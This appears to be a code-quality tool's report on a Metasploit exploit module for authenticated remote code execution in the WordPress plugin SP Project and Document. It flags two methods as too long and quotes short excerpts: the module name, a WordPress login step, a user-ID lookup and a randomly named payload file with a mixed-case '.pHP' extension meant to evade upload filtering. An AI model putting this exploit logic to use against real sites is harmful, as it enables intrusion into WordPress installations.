modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
Method initialize
has 38 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Wordpress Plugin SP Project and Document - Authenticated Remote Code Execution',
Method exploit
has 36 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
fail_with(Failure::NoAccess, 'Authentication failed') unless cookie
user_id = get_user_id(cookie)
payload_name = "#{Rex::Text.rand_text_alpha_lower(5)}.pHP"